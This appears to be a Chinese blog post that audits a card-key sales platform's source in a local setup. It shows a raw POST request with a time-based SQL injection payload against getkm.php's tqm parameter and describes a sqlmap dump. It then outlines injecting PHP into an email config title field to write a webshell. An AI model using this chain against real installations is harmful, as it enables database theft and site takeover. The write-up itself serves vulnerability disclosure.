窗体测试只能用于本地测试_卡密平台审计到getshell——本地测试

最新推荐文章于 2021-06-27 09:24:56 发布
最新推荐文章于 2021-06-27 09:24:56 发布
阅读量90 收藏
点赞数
文章标签: 窗体测试只能用于本地测试

本次渗透为本地测试,仅提供学术交流,切勿用于非法用途

找了个源码搭建好了

f61eb680ddfcc485781041aa38e089d1.png

后台地址为默认的

a409cf8ef708b1b46e0ee39f93d79797.png

接下来就是找找源码中一些关键的文件了,发现getkm.php可能存在注入

bbbb18e5472e2eaeabc34585a0b78dd1.png

直接代入tqm参数,我们看看包含的common.php文件有没有过滤机制

1533eb09e63d9bf9cecec08c3f7a27de.png

貌似只有个防cc和一个360网站卫士,还好,能绕过。

POST /getkm.php HTTP/1.1

Host: 127.0.0.1

User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3

Accept-Encoding: gzip, deflate

Content-Type: application/x-www-form-urlencoded

Content-Length: 57

Cookie: PHPSESSID=cidvriorg2as3nbgc575f6mhdr

Connection: close

Upgrade-Insecure-Requests: 1

tqm=11' AND (SELECT * FROM (SELECT(SLEEP(5)

构造一波,看看响应码

c4f807b7027c1d6d45d168cc66fc1656.png

丢sqlmap里面

246301f4e76b65b20b4d29908e052cd9.png

接下来就是常规跑密码,我就不说了。

getshell

fc5e84cd3c4194c52494bd13262af0d7.png

我们去跟进一下set.php文件

775c8fd58d052d5389d9e8dd2eaeb280.png

包含emailconfig.php,继续跟进

1f162e87d4f192059e425022540b8ee4.png

发现title处可以构造一下phpinfo

bc7256fc1c7cd99eb7c7de26cb5a29f5.png

成功执行

988dbd087d46e963694d11819bc83e4c.png

这里就可以直接写shell了,构造个一句话

9691866227f482fbf2b24d22a94462fe.png

也希望用这套源码的朋友,多多注意下!

制作不易,点个赞再走吧!

#网络安全在我身边#

weixin_39856630
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
php mysql 做系统_PHP+MYSQL会员系统的开发实例教程
weixin_39776991的博客
01-18 258
本文通过一个简单的实例完成了完整的PHP+MySQL会员系统功能。是非常实用的一个应用。具实现步骤如下:一、会员系统的原理:登陆-->判断-->保持状态(Cookie或Session)-->验证状态及其权限二、会员系统的安全:1、学会使用常量提高md5安全性2、Cookie/ Session 少用明文信息3、Session安全性要大于Cookie4、使用Cookie/ Sess...
php发_发网代码审计
weixin_36386044的博客
02-06 325
前言好胸弟柠枫昨天dd了我一下,这不,叫我一起审计的cms君无戏言,最近也在整二进制,当然要跟我的好胸弟一起组队py一下,不知道我都多久没审了,吐咱语文也不是很好,各位看官就将就着看看就好,水文勿喷0x01. 首页功能点审计打开一看,发现不是mvc框架了,那就感觉没啥好看头了,对于发网这种功能一般情况下是没多少功能点让我getshell的(可能是我太菜,大佬也可以审计一波,交流交...
getkm.php,beast_mm.c
weixin_39989939的博客
04-02 87
/*+----------------------------------------------------------------------+| PHP Version 5 |+-----------------------------------------------------...
自动充值平台开发进程之联通一最终实现
weixin_30858241的博客
06-25 1346
前两篇已把相应的准备工作和功能说明列了一下,今天就把详细的实现写一下,以后的将把13800138000的语音拨号系统,和手机短信群发的的实现也发上。 开始这次的内容。 首先就是需要用到模拟提交的两个类 HttpHead.cs 这个类(其实是结构)它的主要功能就是封装了Http请求的一个头信息 using System;using System.Net;using System.Drawi...
getkm.php,call.php
weixin_39634884的博客
04-02 157
/*php api.php |awk '{sum+=$1} END {print "Avg= ", sum/NR}'seq 50|xargs -i php /wwwroot/data_site/api.local.com/call.php*/define('APPLICATION_PATH', realpath(__DIR__));$loader=\Yaf\Loader::getInstance(...
fk.zip_MD5 FK_txprotect.php_免签约__提取源码
09-15
通常用于激活服务、兑换虚拟商品等,而“fk.zip”这个压缩包内包含的“FK_txprotect.php”源码就是一套专门用于提取和发系统的PHP解决方案,它免去了商家签约支付平台的繁琐过程,极大地简化了业务流程。...
源码_happenn1i_html验证_系统_验证系统_验证_
10-03
【源码_happenn1i_html验证_系统_验证系统_验证_】这个项目是一个基于PHP的管理与验证系统,主要用于实现在线产品的激活功能。这个系统的核心在于生成和验证,使得用户可以通过输入有效的来...
简单-在线生成源码_在线生产_在线生产_加入代码_代码_waterk91_
10-02
在IT行业中,(Card Number or Key, 简称Card/MK)是一种常见的用于授权、验证或者交易的安全凭证。在线生成源码是一个关键的系统设计,尤其适用于电子商品销售、游戏充值、会员服务等领域。"waterk91"可能...
私人出售系统源码V6.zip_mathematicsseg__出售
09-20
3.如果自己有企业接口也只是想卖可以使用咱们论坛的友价虚拟在线商城系统,里面可以出售系统! 运行环境: php5.3+Mysql 1.上传源码直接访问http://您的域名/install 2.按照提示安装,安装到最后别忘记点击...
com.km_i7_系统_
09-30
系统的设计和实现涉及到多个技术知识点: 1. **后端开发**:这个系统的核心部分可能是用某种编程语言(如Java、Python、PHP等)编写的后端服务。后端负责处理的生成、存储、验证等逻辑,通常需要与数据库...
shell加工具shc的安装和使用
weixin_30252155的博客
01-15 478
shell加工具shc的安装和使用1)工具说明shell脚本是可读写的,很有可能会泄露敏感信息,如用户名/码/路径/IP等.同样在shell脚本运行时会也泄露敏感信息.shc是一个加shell脚本的工具,它的作用是把shell脚本转换为一个可执行的二进制文件.这就很好的解决了上述问题.2)下载安装下载:http://www.datsi.fi.upm.es/~frosal...
shell 下生成32位随机
IChen.的博客
05-22 1214
cat /dev/urandom | head -1 | md5sum | head -c 32 >> /pass
hive和cm 安装不在同一机器 HiveMetaException:Failed load the driver
weixin_42319892的博客
09-15 111
发现/opt/cloudera/parcels/CDH-5.14.2-1.cdh5.14.2.p0.3/lib/hive/lib/mysql-connector-java-5.1.36.jar没有
shell脚本加工具shc
西京刀客
06-27 1983
文章目录shell脚本加工具shc应用场景shc 安装 和使用shc解 shell脚本加工具shc shc是一个加shell脚本的工具.它的作用是把shell脚本转换为一个可执行的二进制文件. 应用场景 用shell脚本对系统进行自动化维护,简单,便捷而且可移植性好.但shell脚本是可读写的,很有可能会泄露敏感信息,如用户名,码,路径,IP等. 对于脚本中含有一些敏感信息的,通常我们都想做成二进制程序,不让用户看到源码,对于有这种需求的通常我们一般采用shc或者gzexe,我个人还是比较推荐
Nginx中accept锁的机制与实现详细介绍
weixin_44400506的博客
01-10 971
前言   nginx采用多进程的模,当一个请求过来的时候,系统会对进程进行加锁操作,保证只有一个进程来接受请求。   本文基于Nginx 0.8.55源代码,并基于epoll机制分析   1. accept锁的实现   1.1 accpet锁是个什么东西   提到accept锁,就不得不提起惊群问题。   所谓惊群问题,就是指的像Nginx这种多进程的服务器,在fork后同时监听同一个端口时,如果...
飞机大战系列 Space War1.0(免费,开源)
07-14
飞机大战系列 Space War1.0(免费,开源)
基于Hadoop的文件词频统计的实现(大数据技术课程设计)
07-14
使用Hadoop大数据架构系中的HDFS、HBase以及Spark软件,完成大数据处理的典型案例:文件词频统计的实现。
湖科大计算机网络视频笔记,跟着视频系统学了一遍的记录
最新发布
07-14
视频链接:https://www.bilibili.com/video/BV1c4411d7jb/,适用于考研后期查缺补漏和前期确定复习方向、期末考和课前预习。做成PDF形式便于查阅和在iPad上查看。
matlab下载,表面张力,main.m
07-14
matlab下载,表面张力,main.m
shell脚本加验证
05-13
1. 首先生成一批,每个都是唯一的,并且只能使用一次; 2. 编写一个Shell脚本,在脚本中加入验证功能; 3. 用户在运行脚本时,需要输入; 4. 脚本会将用户输入的发送到服务器进行验证; 5. 如果...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值